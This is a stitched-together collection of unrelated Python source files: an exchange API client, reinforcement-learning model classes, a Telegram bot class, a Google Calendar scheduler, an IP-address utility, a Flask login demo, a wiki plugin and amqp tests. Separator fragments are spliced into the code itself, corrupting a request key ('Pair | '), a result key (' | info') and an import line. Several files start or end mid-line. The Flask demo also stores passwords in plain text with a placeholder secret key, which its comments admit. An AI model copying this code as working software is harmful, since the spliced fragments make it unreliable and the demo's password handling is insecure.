'https://github.com/OferE/bit2c',
],
},
'api': {
'public': {
'get': [
'Exchanges/{pair}/Ticker',
'Exchanges/{pair}/orderbook',
'Exchanges/{pair}/trades',
],
},
'private': {
'post': [
'Account/Balance',
'Account/Balance/v2',
'Merchant/CreateCheckout',
'Order/AccountHistory',
'Order/AddCoinFundsRequest',
'Order/AddFund',
'Order/AddOrder',
'Order/AddOrderMarketPriceBuy',
'Order/AddOrderMarketPriceSell',
'Order/CancelOrder',
'Order/MyOrders',
'Payment/GetMyId',
'Payment/Send',
],
},
},
'markets': {
'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
},
'fees': {
'trading': {
'maker': 0.5 / 100,
'taker': 0.5 / 100,
},
},
})
async def fetch_balance(self, params={}):
balance = await self.privatePostAccountBalanceV2()
result = {'info': balance}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balance:
available = 'AVAILABLE_' + currency
account['free'] = balance[available]
account['total'] = balance[currency]
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, params={}):
orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook)
async def fetch_ticker(self, symbol, params={}):
ticker = await self.publicGetExchangesPairTicker(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = self.milliseconds()
averagePrice = float(ticker['av'])
baseVolume = float(ticker['a'])
quoteVolume = baseVolume * averagePrice
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['h']),
'ask': float(ticker['l']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['ll']),
'change': None,
'percentage': None,
'average': averagePrice,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def parse_trade(self, trade, market=None):
timestamp = int(trade['date']) * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'id': str(trade['tid']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': None,
'type': None,
'side': None,
'price': trade['price'],
'amount': trade['amount'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
market = self.market(symbol)
response = await self.publicGetExchangesPairTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
method = 'privatePostOrderAddOrder'
order = {
'Amount': amount,
'Pair | ': self.market_id(symbol),
}
if type == 'market':
method += 'MarketPrice' + self.capitalize(side)
else:
order['Price'] = price
order['Total'] = amount * price
order['IsBid'] = (side == 'buy')
result = await getattr(self, method)(self.extend(order, params))
return {
' | info': result,
'id': result['NewOrder']['id'],
}
async def cancel_order(self, id, symbol=None, params={}):
return await self.privatePostOrderCancelOrder({'id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.implode_params(path, params)
if api == 'public':
url += '.json'
else:
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({'nonce': nonce}, params)
body = self.urlencode(query)
signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'key': self.apiKey,
'sign': self.decode(signature),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf1.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf1.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf1.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf1.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf1.get_collection(
tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
IMORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input placeholder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
tf.keras. models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
"""Example of a TorchModelV2 using batch normalization."""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name, **kwargs):
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
layers = []
prev_layer_size = int(np.product(obs_space.shape))
self._logits = None
# Create layers 0 to second-last.
for size in [256, 256]:
layers.append(
SlimFC(
in_size=prev_layer_size,
out_size=size,
initializer=torch_normc_initializer(1.0),
activation_fn=nn.ReLU))
prev_layer_size = size
# Add a batch norm layer.
layers.append(nn.BatchNorm1d(prev_layer_size)) |
self._logits = SlimFC(
in_size=prev_layer_size,
out_size=self.num_outputs,
initializer=torch_normc_initializer(0.01),
| activation_fn=None)
self._value_branch = SlimFC(
in_size=prev_layer_size,
out_size=1,
initializer=torch_normc_initializer(1.0),
activation_fn=None)
self._hidden_layers = nn.Sequential(*layers)
self._hidden_out = None
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
# Set the correct train-mode for our hidden module (only important
# b/c we have some batch-norm layers).
self._hidden_layers.train(mode=input_dict.get("is_training", False))
self._hidden_out = self._hidden_layers(input_dict["obs"])
logits = self._logits(self._hidden_out)
return logits, []
@override(ModelV2)
def value_function(self):
assert self._hidden_out is not None, "must call forward first!"
return torch.reshape(self._value_branch(self._hidden_out), [-1])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other related utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosph | ere import CO2Cor | rector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from .geometry import SunZenithCorrector # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module conta | ins the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
def __init__(self,
id,
video_file_id,
title,
description=None,
caption=None,
reply_markup=None,
input_message_content=None,
**kwargs):
# Required
| super(InlineQueryResultCachedVideo, self).__init__('video', id)
self.video_file_id = video_file_id
self.title = title
# Optionals
if description:
self.description = description
if caption:
self.caption = caption
if reply_markup:
self.reply_markup = reply_markup
if input_message_content:
self.input_message_content = input_message_content
@staticmethod
def de_json(data):
data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
data['input_message_content'] = InputMessageContent.de_json(data.get(
'input_message_content'))
return InlineQueryResultCachedVideo(**data)
|
ns an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
""" "Shortcut" to the service/API call
Args:
service_type (str): which service? calendar or url (urlshortener)
Returns:
build object kind of thing (google)
"""
service = ("", "")
if service_type == "calendar":
service = ("calendar", "v3")
elif service_type == "url":
service = ("urlshortener", "v1")
else:
print (" wrong key for Google Service")
exit()
return build(serviceName=service[0], version=service[1], http=googleAuth())
def listEvents():
# The Calendar API's events().list method returns paginated results, so we
# have to execute the request in a paging loop. First, build the
# request object. The arguments provided are:
# primary calendar for user
service = useService('calendar')
request = service.events().list(calendarId=CALENDAR_ID)
# Loop until all pages have been processed.
while request != None:
# Get the next page.
response = request.execute()
# Accessing the response like a dict object with an 'items' key
# returns a list of item objects (events).
for event in response.get('items', []):
print ("--------------------------")
# The event object is a dict object with a 'summary' key.
print(event['summary'])
print(event['start']['dateTime'])
print(event['location'])
print(event['description'])
# Get the next request object by passing the previous request object to
# the list_next method.
request = service.events().list_next(request, response)
def scheduleEvent(list_schedule, event_data, isevent=True):
'''
Inserts the event into google calendar.
:param:list_schedule list list of dates
:param:event_data dict event data
:param:isevent bool is it event or a manual update? default true (event)
'''
cal_service = useService('calendar')
timezone = 'America/Argentina/Ushuaia'
if not isevent:
event = {}
event['summary'] = "Actualizacion sitio: changelog: " + event_data['start']
event['start'] = {'dateTime': event_data['start'], 'timeZone': timezone}
event['end'] = {'dateTime': event_data['end'], 'timeZone': timezone}
end_date_iso = event_data['end'].isoformat()
event['description'] = event_data['description']
#use recurrence so we dont have to create daily events within same time
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event))
print(" Manual update added")
else:
'''
ifttt ingredients
Title | The event's title.
Description The event's description.
Where The location where the event takes place.
Starts ej August 23, 2011 at 10:00PM
Ends ej: August 23, 2011 at 11:00PM
'''
# so dirty
gcal_description = "#{city} {tags} {title} {shortURL}({human_date}{place})"
end_date_iso = event_data['end']['timestamp'].isoformat()
def _fecha_humana(date_time, abbr=False):
""" translate to | human dates (spanish, quick and dirty)
Args:
date_time (datetime object)
abbr (boolean) abreviate month names? default False
Returns:
str
"""
tmp = date_time.strftime('%d de //%m//, %H:%M hs')
tmp_month_number = tmp.split("//")[1].split("//")[0]
month = ""
if tmp_month_number == "01":
month = "en." if abbr else "enero"
if tmp_month_number == "02":
month = "febr." if abbr else "febrero"
if tmp_month_number == "03":
month = "mzo." if abbr else "marzo"
if tmp_month_number == "04":
month = "abr." if abbr else "abril"
if tmp_month_number == "05":
month = "my." if abbr else "mayo"
if tmp_month_number == "06":
month = "jun." if abbr else "junio"
if tmp_month_number == "07":
month = "jul." if abbr else "julio"
if tmp_month_number == "08":
month = "agt." if abbr else "agosto"
if tmp_month_number == "09":
month = "sept." if abbr else "septiembre"
if tmp_month_number == "10":
month = "oct." if abbr else "octubre"
if tmp_month_number == "11":
month = "nov." if abbr else "noviembre"
if tmp_month_number == "12":
month = "dic." if abbr else "diciembre"
tmp = tmp.replace("//" + tmp_month_number + "//", month)
return tmp
#cycle list
for date_time in list_schedule:
human_datetime_start = ""
event = {}
tags = ""
city = ""
place = ""
shortURL = ""
if event_data['city'] == "rio-grande":
city = "RioGrande"
else:
city = event_data['city'].title()
#event['reminders'] = dict()
#event['reminders']['useDefault'] = False #remove reminder, this is for myself
event['summary'] = event_data['title']
event['start'] = {'dateTime': date_time[0], 'timeZone': timezone}
event['end'] = {'dateTime': date_time[1], 'timeZone': timezone}
#human_datetime_end = _fecha_humana(event_data['start']['timestamp'], abbr=True) #the real date
human_datetime_end = event_data['start']['timestamp'].strftime('%d/%m, %H:%M hs')
# if not time set, remove the 00:00 added when creating the timestamp
if not event_data['start']['time']:
human_datetime_end = human_datetime_end.replace("00:00 hs","")
#if all day: {'date': eEnd}
print (" schedule from {} to {} until {}".format(
date_time[0].replace("T", " ").replace(":00-03:00","")
,date_time[1].replace("T", " ").replace(":00-03:00","")
, end_date_iso.split("T")[0]
)
)
if not event_data['location'] is "":
event['location'] = event_data['location']
if event['location']:
place = ", en " + event_data['location']
final_summary = event['summary']
tags = ""
if event_data['tags']:
#tags = " #" + event_data['tags'].replace(",", " #")
all_tags = event_data['tags'].split(",")
reminding_tags = list()
# shouldn't be doing this but it's quicker now than using regex
final_summary = " " + final_summary + " "
# and also shouldn't be doing this but we don't want to deal with accented letters
# and the tag stuff...
final_summary = final_summary.replace("ó","o").replace("í","i")
#use part of the title to include tags (saving space)
tmp_tag = ""
for tag in all_tags:
tmp_tag = " " + tag + " "
if tmp_tag.lower() in final_summary.lower():
pattern = re.compile( re.escape(tmp_tag), re.IGNORECASE )
final_summary = pattern.sub(" #" + tag, final_summary)
else:
reminding_tags.append(tag)
final_summary = final_summary.strip()
tags = " #".join(reminding_tags)
tags = "#" + tags
if event_data['short-url']:
shortURL = event_data['short-url'] + " "
event['description'] = gcal_description.format(
city=city, tags=tags, title=final_summary
, human_date=human_datetime_end, place=place
, shortURL=shortURL
)
#use recurrence so we dont have to create daily events within same time
#event['recurrence'] = ['RRULE:FREQ=DAILY;UNTIL=20151007T193000-03:00']
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
#newEvent = cal_service.events().insert(calendarId=CALENDAR_ID, body=event)
executeCall(cal_service.events().insert(calendarId=CALENDA |
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
|
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
"""Methods for multiple machi | nes on one subnet.
As implemented only supports IPv4."""
octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
@classmethod
def asList(cls, ipaddress, rangeCheck=False):
"""For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
If already a list, a copy is made and returned."""
if isinstance(ipaddress, basestring):
octetsMatch = IPAddress.octetsRegex.search(ipaddress)
if not octetsMatch:
raise Exception("won't recognize as IP address: {0}".format(ipaddress))
octets = [octetsMatch.group(1),
octetsMatch.group(2),
octetsMatch.group(3),
octetsMatch.group(4)]
for index, octet in enumerate(octets):
octet = int(octet)
if rangeCheck and octet > 255:
raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
octets[index] = octet
return octets
elif isinstance(ipaddress, (int, long)):
octets = []
while ipaddress:
octets.append(ipaddress % 256)
ipaddress /= 256
octets += [0 for i in range(max(4 - len(octets), 0))]
octets.reverse()
return octets
else:
# force making a copy
return list(ipaddress)
@classmethod
def asTuple(cls, ipaddress):
"""For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
if isinstance(ipaddress, tuple):
return ipaddress
elif isinstance(ipaddress, list):
return tuple(ipaddress)
else:
return tuple(cls.asList(ipaddress))
@classmethod
def asString(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
if isinstance(ipaddress, basestring):
return ipaddress
if isinstance(ipaddress, (int, long)):
ipaddress = cls.asList(ipaddress)
return ".".join(map(str, ipaddress))
@classmethod
def asInteger(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return 175844675.
At the time of this writing, such an integer however is
not accepted as input by other methods of this class."""
octets = cls.asList(ipaddress) # must make a copy
integer = 0
while octets:
integer = 256 * integer + octets.pop(0)
return integer
@classmethod
def bitAnd(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet & otherOctet)
return octets
@classmethod
def bitOr(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet | otherOctet)
return octets
@classmethod
def bitNot(cls, one):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
octets = []
for oneOctet in one:
octets.append(~oneOctet & 255)
return octets
@classmethod
def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
"""For stem="example" and ipaddress="10.123.45.67" return "example-067".
If octets=2 return "example-045-067"."""
name = stem
ipaddress = IPAddress.asTuple(ipaddress)
if not separator:
# empty string instead of e.g. None
separator = ""
for index in range(-octets, 0):
# create leading zeros, e.g. from "19" to "019"
name += separator + "%03d" % ipaddress[index]
return name
@classmethod
def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
"""For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
if not isinstance(oneInSubnet, (list, tuple)):
oneInSubnet = cls.asList(oneInSubnet)
# less than stellar decoding of otherNumber, but it works in actual use cases
if isinstance(otherNumber, int):
# in theory handling more than 16 bits' 65536 would be desirable,
# practically handling up to 16 bits' 65535 is enough
if otherNumber <= 255:
otherNumber = [otherNumber]
else:
otherNumber = [otherNumber >> 8, otherNumber & 255]
if not isinstance(otherNumber, (list, tuple)):
otherNumber = otherNumber.split(".")
otherNumber = map(int, otherNumber)
if not isinstance(netmask, (list, tuple)):
netmask = cls.asList(netmask)
complementOfNetmask = cls.bitNot(netmask)
contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
result = cls.bitOr(contributedBySubnet, contributedByNumber)
return result
if __name__ == "__main__":
print IPAddress.asList("10.123.45.67")
print IPAddress.asList((192, 168, 95, 17))
print IPAddress.asList([192, 168, 95, 17])
print IPAddress.asList(175844675)
print IPAddress.asTuple("10.123.45.67")
print IPAddress.asTuple([192, 168, 95, 17])
print IPAddress.asTuple((192, 168, 95, 17))
print IPAddress.asTuple(175844675)
print IPAddress.asString([192, 168, 95, 17])
print IPAddress.asString((192, 168, 95, 17))
print IPAddress.asString("10.123.45.67")
print IPAddress.asString(175844675)
print IPAddress.asInteger("10.123.45.67")
print IPAddress.asInteger([10,123,45,67])
print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
print IPAddress.bitNot("1.2.3.4")
print IPAddress.nameWithNumber("example", "10.123.45.67")
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
print IPAddress.numberWithinSubnet("10.123.45.67", "89")
print IPAddress.numberWithinSubnet("10.123.45.67", 89)
print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Create application
app = Flask(__name__)
# Create dummy secrey key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not right thing to do in real world application.
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
login = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120))
password = db.Column(db.String(64))
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
# Required for administrative interface
def __unicode__(self):
return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
login = TextField(validators=[Required()])
password = PasswordField(validators=[Required()])
def validate_login(self, field):
user = self.get_user()
if user is None:
raise ValidationError('Invalid user')
if user.password != self.password.data:
raise ValidationError('Invalid password')
def get_user(self):
return db.session.query(User).filter_by(login=self.login.data).first()
class RegistrationForm(wtf.Form):
login = TextField(validators=[Required()])
email = TextField()
password = PasswordField(validators=[Required()])
def validate_login(self, field):
if db.session.query(User).filter_by(login=self.login.data).count() > 0:
raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
login_manager = login.LoginManager()
login_manager.setup_app(app)
# Create user loader function
@login_manager.user_loader
def load_user(user_id):
return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
form = LoginForm(request.form)
if form.validate_on_submit():
user = form.get_user()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
form = RegistrationForm(request.form)
if form.validate_on_submit():
us | er = User()
form.populate_obj(user)
|
db.session.add(user)
db.session.commit()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
login.logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
# Initialize flask-login
init_login()
# Create admin
admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
# Add view
admin.add_view(MyModelView(User, db.session))
# Create DB
db.create_all()
# Start app
app.debug = True
app.run()
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.pl | ugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
#settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
slug = settings.SLUG
urlpatterns = patterns('',
url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
url(r'^search/$', views.AttachmentSearchView.as_view(), nam | e='attachments_search'),
url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_history'),
url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
)
article_tab = (_(u'Attachments'), "icon-file")
article_view = views.AttachmentView().dispatch
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [{'model': models.AttachmentRevision,
'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
'key': ARTICLE_EDIT,
'created': True,
'get_article': lambda obj: obj.attachment.article}
]
markdown_extensions = [AttachmentExtension()]
def __init__(self):
#print "I WAS LOADED!"
pass
registry.register(AttachmentPlugin)
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
exc = KeyError(34)
asser | t not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
assert next(it) == 2
class test_str_to_bytes:
de | f test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
|
_cached_fetch(lambda message_id: to_dict_cache_key_id(message_id, apply_markdown),
Message.get_raw_db_rows,
message_ids,
id_fetcher=id_fetcher,
cache_transformer=cache_transformer,
extractor=extract_message_dict,
setter=stringify_message_dict)
message_list = []
for message_id in message_ids:
